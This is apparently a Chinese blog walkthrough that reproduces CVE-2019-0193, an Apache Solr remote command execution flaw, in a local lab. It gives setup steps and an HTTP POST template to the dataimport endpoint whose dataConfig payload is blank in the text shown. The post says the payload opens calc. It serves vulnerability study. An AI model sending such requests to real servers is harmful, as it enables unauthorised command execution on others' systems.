CVE-2019-0193:Apache Solr远程命令执行漏洞复现

0x01 漏洞描述

 2019年8月1日,Apache Solr官方发布了CVE-2019-0193漏洞预警,漏洞危害评级为严重

0x02 漏洞环境

1.服务器需要安装java环境:

https://jingyan.baidu.com/article/375c8e190c1f9525f2a22931.html

2.服务器需要安装curl环境:

(1)下载curl包:https://skanthak.homepage.t-online.de/download/curl-7.64.1.cab

(2)将其解压至  C:\Program Files\curl 文件夹

(3)配置环境变量:类似java环境变量 右键此电脑——>属性——>高级系统设置——>环境变量——>系统变量创建CURL_HOME 变量值为C:\Program Files\curl——>系统变量path中新建 值为 %CURL_HOME%\I386——>保存退出

(4)打开doc窗口,输入curl --help:

CVE-2019-0193:Apache Solr远程命令执行漏洞复现_第1张图片

3.漏洞环境配置:

(1)下载Apache solr :http://mirrors.tuna.tsinghua.edu.cn/apache/lucene/solr/7.7.2/solr-7.7.2.zip

(2)解压至任意目录

(3)在powershell(管理员)中进入到你解压的目录,执行以下命令:bin/solr -e dih

(4)看到successful字样即算搭建成功

(5)本地访问 127.0.0.1:8983     同网段访问:192.168.109.130:8983 (服务器地址)    成功

CVE-2019-0193:Apache Solr远程命令执行漏洞复现_第2张图片

 

0x03 漏洞复现

1. 使用curl获取core信息中的name信息:curl http://192.168.109.130:8983/solr/admin/cores

CVE-2019-0193:Apache Solr远程命令执行漏洞复现_第3张图片

2.使用burp抓包:刷新访问页面

CVE-2019-0193:Apache Solr远程命令执行漏洞复现_第4张图片

3.send to repeater——>复制下面的payload——>修改 core_name为上面你的core_name

POST /solr//dataimport HTTP/1.1
Host: 127.0.0.1:8983
Content-Length: 763
User-Agent: Mozilla/5.0
Content-type: application/x-www-form-urlencoded
Connection: close

command=full-import&verbose=false&clean=false&commit=true&debug=true&core=&name=dataimport&dataConfig=






CVE-2019-0193:Apache Solr远程命令执行漏洞复现_第5张图片

4.执行效果如下

CVE-2019-0193:Apache Solr远程命令执行漏洞复现_第6张图片

5.执行语句代码如下:

如果我把calc改为notepad就会打开一个记事本。

参考:https://www.cnblogs.com/paperpen/p/11328728.html

你可能感兴趣的:(漏洞复现)